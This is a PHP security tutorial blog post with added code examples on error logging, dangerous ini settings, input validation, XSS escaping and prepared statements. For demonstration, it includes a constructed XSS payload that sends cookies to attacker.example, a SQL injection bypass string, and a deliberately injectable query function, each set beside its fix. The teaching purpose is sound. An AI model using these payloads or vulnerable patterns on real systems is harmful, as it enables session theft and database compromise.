Tips to Create Secure PHP Applications

by Janeth Kent Date: 29-06-2019 php xss tips sql security injection


PHP is one of the most popular programming languages for the web. It makes a great deal easy for the programmer, but the same conveniences can open security holes that cause problems later in development and in production. Below are a few tips to help you avoid some common PHP security pitfalls and development bugs.

1. Use of Proper Error Reporting

Error reporting can be your best friend during development: error reports help you find misspelled variables and detect incorrect function usage. Once the site goes live, however, make sure that no error output reaches the browser. PHP error messages include file paths, line numbers and sometimes variable contents, all of which help an attacker map your application.

Calling error_reporting(0) at the top of your application file(s) hides the messages, but it also stops them from being logged, so you lose the information you need to debug a live problem. The better approach is to keep error_reporting at E_ALL, switch off display_errors and switch on log_errors.

Always log your errors to a protected file outside the document root; that is what lets you reconstruct what went wrong. A custom handler installed with set_error_handler can write those entries, set_exception_handler covers uncaught exceptions, and a shutdown function catches fatal errors, which never reach set_error_handler. Note that set_error_handler logs nothing by itself: your handler has to call error_log (or your logger) explicitly.
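The production setup described above, as an added example that is not part of the original article. It assumes an APP_ENV environment variable and a log directory /var/log/myapp that the web server user can write to but that is not served; both are assumptions for this example.

```php
<?php
// Added example (not from the original article): production error handling for PHP.
// Assumptions: APP_ENV is set in the environment; /var/log/myapp is writable by the
// web server user and is outside the document root.

declare(strict_types=1);

$isProduction = (getenv('APP_ENV') ?: 'production') === 'production';

// Report everything internally; the environment only decides where it goes.
error_reporting(E_ALL);
ini_set('display_errors', $isProduction ? '0' : '1');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/myapp/php-error.log'); // never inside the web root

// Warnings and notices: write them to the log instead of echoing paths and
// variable contents to the client. In development, escalate them to exceptions.
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline) use ($isProduction): bool {
    if (!(error_reporting() & $errno)) {
        return false; // respect @-suppressed calls
    }
    error_log(sprintf('%s in %s:%d', $errstr, $errfile, $errline));
    if (!$isProduction) {
        throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
    }
    return true; // handled; PHP's default (displaying) handler does not run
});

// Uncaught exceptions: full detail to the log, a generic message to the user.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('Uncaught %s: %s in %s:%d', get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    if (!headers_sent()) {
        http_response_code(500);
    }
    echo 'An internal error occurred.';
});

// Fatal errors bypass set_error_handler entirely; pick them up at shutdown.
register_shutdown_function(function (): void {
    $err = error_get_last();
    $fatal = [E_ERROR, E_PARSE, E_CORE_ERROR, E_COMPILE_ERROR];
    if ($err !== null && in_array($err['type'], $fatal, true)) {
        error_log(sprintf('Fatal: %s in %s:%d', $err['message'], $err['file'], $err['line']));
    }
});
```

With display_errors off and log_errors on, PHP's own log entries and the explicit error_log() calls both land in the configured file, so a single tail of that file shows everything the application would otherwise have printed to visitors.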

2. Disable PHP’s harmful Features

PHP's creators have always included features to make PHP development easier. Some of these helpful features have unintended consequences. We can call them "bad features" because they bypass data validation and create a path for bugs to find their way into scripts. The best known are register_globals, which turns every GET, POST and cookie key into a PHP variable, and magic_quotes_gpc, which silently escapes incoming data so that scripts come to rely on it instead of escaping correctly themselves. One of the first things you should do when development begins is to disable these features. Depending on the host you are using, they may or may not already be turned off; if you are developing on your own computer or another local environment, they probably are not. Both were deprecated in PHP 5.3 and removed in PHP 5.4 (the "PHP 6" that was supposed to remove them never shipped), but they are still ubiquitous in PHP 4 code and in older PHP 5 hosting setups, and code written to depend on them breaks or becomes exploitable when it is moved to a current interpreter.
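Because register_globals and magic_quotes_gpc are PHP_INI_PERDIR settings, a script cannot switch them off with ini_set(); the fix belongs in php.ini or .htaccess, and the most a script can do is detect them and refuse to run. The following bootstrap guard is an added example, not code from the original article; it also covers directives that still exist on current PHP (allow_url_include, display_errors, expose_php), which is an extension of the article's list.

```php
<?php
// Added example (not from the original article): refuse to start when legacy or
// dangerous php.ini settings are enabled. On current PHP the removed directives are
// unknown to ini_get(), which returns false for them, so they read as "off".

declare(strict_types=1);

/** Return setting => reason for every dangerous directive that is currently on. */
function dangerousSettingsEnabled(): array
{
    $mustBeOff = [
        'register_globals'  => 'every GET/POST/cookie key becomes a global variable (removed in PHP 5.4)',
        'magic_quotes_gpc'  => 'input is silently escaped, so code stops escaping correctly (removed in PHP 5.4)',
        'allow_url_include' => 'include/require can load code from a remote URL',
        'display_errors'    => 'stack traces and file paths are printed to the client',
        'expose_php'        => 'the PHP version is advertised in the X-Powered-By header',
    ];

    $enabled = [];
    foreach ($mustBeOff as $name => $reason) {
        $value = ini_get($name);
        // ini_get() yields "1"/"On" when set, ""/"0"/"Off" when unset, false if the
        // directive does not exist in this PHP build.
        if ($value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $enabled[$name] = $reason;
        }
    }
    return $enabled;
}

$bad = dangerousSettingsEnabled();
if ($bad !== []) {
    foreach ($bad as $name => $reason) {
        error_log("Insecure PHP setting {$name} is enabled: {$reason}");
    }
    http_response_code(500);
    exit('Server misconfigured.');
}
```

Include the guard from the application's front controller before any other code runs, so a misconfigured host fails loudly on the first request instead of serving the application with validation silently bypassed.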

3. Validate Input

In addition to escaping characters on output, another good way to protect your application is to validate input. You usually know exactly what kind of data to expect: an integer id, an e-mail address, a value from a fixed list. So the simplest way to protect yourself is to accept only data that matches that expectation and reject everything else, rather than trying to strip out "bad" characters from free-form text. Validation and escaping are complementary, not alternatives: a name such as O'Brien is perfectly valid input and still has to be escaped before it is placed in an SQL string or an HTML page.
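A whitelist-style validator for a registration form, as an added example that is not part of the original article. The field names, the rules and the list of accepted countries are assumptions made for this example, and the sample submission is constructed.

```php
<?php
// Added example (not from the original article): validate a form submission against
// what each field is expected to contain. Field names, rules and the country list are
// assumptions for this example.

declare(strict_types=1);

const ALLOWED_COUNTRIES = ['ES', 'IT', 'DE', 'FR']; // assumption: the application serves these only

/**
 * Return [validated values, error messages]. Only fields that pass every rule appear in
 * the first array, so downstream code never touches raw $_POST data.
 */
function validateRegistration(array $input): array
{
    $clean = [];
    $errors = [];

    // Username: a fixed alphabet and length; anything outside it is rejected outright.
    $username = $input['username'] ?? '';
    if (!is_string($username) || !preg_match('/\A[a-z][a-z0-9_]{2,31}\z/', $username)) {
        $errors['username'] = 'use 3-32 lowercase letters, digits or underscores, starting with a letter';
    } else {
        $clean['username'] = $username;
    }

    // E-mail: PHP's syntactic filter; ownership still needs a confirmation link.
    $email = filter_var($input['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors['email'] = 'not a valid e-mail address';
    } else {
        $clean['email'] = $email;
    }

    // Age: a whole number inside a range; "18abc" and "1e3" both fail the INT filter.
    $age = filter_var(
        $input['age'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 18, 'max_range' => 120]]
    );
    if ($age === false) {
        $errors['age'] = 'must be a whole number between 18 and 120';
    } else {
        $clean['age'] = $age; // already an int, not the original string
    }

    // Country: must be one of a known list. Strict comparison so that "0" or 0 never match.
    $country = $input['country'] ?? '';
    if (!is_string($country) || !in_array($country, ALLOWED_COUNTRIES, true)) {
        $errors['country'] = 'unsupported country';
    } else {
        $clean['country'] = $country;
    }

    return [$clean, $errors];
}

// Constructed sample submission standing in for $_POST.
$submission = [
    'username' => 'alice_01',
    'email'    => 'alice@example.com',
    'age'      => '18abc',
    'country'  => 'XX',
];
[$clean, $errors] = validateRegistration($submission);
if ($errors !== []) {
    // Re-display the form with $errors; never continue with partially valid data.
}
```

Every rule here describes what the field must look like rather than what it must not contain, so new attack payloads do not need new rules, and the cleaned values carry their intended types (the age is an int) into the rest of the application.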

4. Watch for Cross Site Scripting (XSS) Attacks in User Input

A web application usually accepts input from users and displays it in some way, and that input can arrive in a wide variety of forms: form fields, query strings, cookies, HTTP headers, file names. When accepting input, allowing HTML is a dangerous thing, because it lets JavaScript execute in unintended ways. If even one hole is left open, JavaScript can run in the victim's browser and steal cookies. That cookie data can then be used to impersonate a real account and give an attacker access to the website's data. There are several ways to protect your site from such attacks. The simplest is to disallow HTML altogether: escape every user-controlled value with htmlspecialchars when it is written into the page, so the browser treats it as text and there is no way for JavaScript to execute. Data placed inside a script block or an attribute needs an escaping routine for that context, since HTML escaping alone is not enough there. If you must accept some HTML, use a whitelist-based sanitizer library rather than a blacklist of tags, and set your session cookie with the HttpOnly flag so that script cannot read it even if an injection slips through.
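The same attacker-controlled value rendered three ways, first unsafely and then escaped for each output context, as an added example that is not part of the original article. The payload is constructed.

```php
<?php
// Added example (not from the original article): the vulnerable rendering next to the
// context-aware escaping that fixes it. The attacker input below is constructed.

declare(strict_types=1);

/** Escape for HTML body text and for double-quoted attribute values. */
function e(string $s): string
{
    // ENT_QUOTES also encodes the single quote; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning "" (which would silently drop the value); the charset must
    // match the <meta charset> of the page.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Escape a value for use inside an inline <script> block (not for on* attributes). */
function eJs($value): string
{
    // The HEX flags encode < > & ' " as \uXXXX, so the output can neither close the
    // <script> element nor break out of a JavaScript string.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed attacker input: closes the attribute, then injects a cookie-stealing script.
$name = '"><script>location="https://attacker.example/?c="+document.cookie</script>';

// VULNERABLE: raw interpolation in three different contexts.
$vulnerable = "<p>Hello $name</p>\n"
            . "<input value=\"$name\">\n"
            . "<script>var user = \"$name\";</script>\n";

// HARDENED: each context gets the escaping routine that is correct for it.
$hardened = '<p>Hello ' . e($name) . "</p>\n"
          . '<input value="' . e($name) . "\">\n"
          . '<script>var user = ' . eJs($name) . ";</script>\n";

echo $hardened;
```

In the hardened output the quote and angle brackets arrive as entities in the HTML contexts and as \u escapes inside the script block, so the browser displays the payload as text. The vulnerable version, by contrast, executes it on page load. Escaping belongs at output time, not when the data is stored, because the same stored value may later be written into different contexts.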

5. Protecting against SQL Injection

SQL injection attacks occur when data is not checked and the application doesn't escape the characters that have meaning inside SQL strings, such as single quotes (') and double quotes ("). If these characters reach the query unchanged, a user can alter the statement itself, for example by making a WHERE clause always true, which is enough to trick a login system into returning the first account in the table.

MySQLi gives you two ways to keep user data out of the SQL text.

The first is mysqli_real_escape_string, which escapes a value for the connection's character set. It is only safe when the escaped value is placed inside quotes in the query and when the connection charset has been set with mysqli_set_charset; escaping a value that is then used bare (for example after WHERE id =) protects nothing.

The second, and preferred, way is prepared statements. A prepared statement separates the SQL logic from the data passed to it: the query text, with ? placeholders, is sent to the server first, and the bound values travel separately, so the server never parses them as SQL. Nothing is "filtered": the values simply cannot change the structure of the statement. Placeholders can only stand in for values, not for table or column names or for keywords such as ASC/DESC, so those must still be checked against a fixed list in your code.
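A user lookup for a login form, first with string concatenation and then with a MySQLi prepared statement, as an added example that is not part of the original article. The connection parameters and the users table (columns id, username, password_hash) are assumptions for this example, and the attacker input is constructed.

```php
<?php
// Added example (not from the original article): the injectable query and its prepared
// statement replacement. Connection details and the users(id, username, password_hash)
// table are assumptions for this example.

declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of returning false
$db = new mysqli('localhost', 'app', 'secret', 'appdb');
$db->set_charset('utf8mb4'); // escaping and binding are only correct for a known charset

/** VULNERABLE: the username is spliced into the SQL text. */
function findUserUnsafe(mysqli $db, string $username): ?array
{
    $sql = "SELECT id, username, password_hash FROM users WHERE username = '$username'";
    // With $username = "admin' OR '1'='1" the WHERE clause is always true and the
    // first row of the table comes back, whatever the attacker typed.
    return $db->query($sql)->fetch_assoc() ?: null;
}

/** FIXED: the statement text is constant; the value is sent as a separate parameter. */
function findUser(mysqli $db, string $username): ?array
{
    $stmt = $db->prepare('SELECT id, username, password_hash FROM users WHERE username = ?');
    $stmt->bind_param('s', $username); // 's' = string; the server never parses it as SQL
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/** Check credentials: prepared lookup plus password_verify against the stored hash. */
function login(mysqli $db, string $username, string $password): bool
{
    $user = findUser($db, $username);
    return $user !== null && password_verify($password, $user['password_hash']);
}

// Constructed attacker input. findUserUnsafe() returns a row for it;
// findUser() looks for a user literally named "admin' OR '1'='1" and finds none.
$attempt = "admin' OR '1'='1";
var_dump(login($db, $attempt, 'anything'));
```

With MYSQLI_REPORT_STRICT enabled, a failed prepare or execute throws instead of returning false, which keeps the code from silently continuing with no result set. The same separation of query text and data is available through PDO's prepare/bindValue if the application is not tied to MySQLi.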

source: http://www.php-developers.org/blog/

Janeth Kent

Graduate in Fine Arts and programmer by passion. When I have a spare moment I retouch photos, edit videos and design things. The rest of the time I write for MA-NO WEB DESIGN AND DEVELOPMENT.
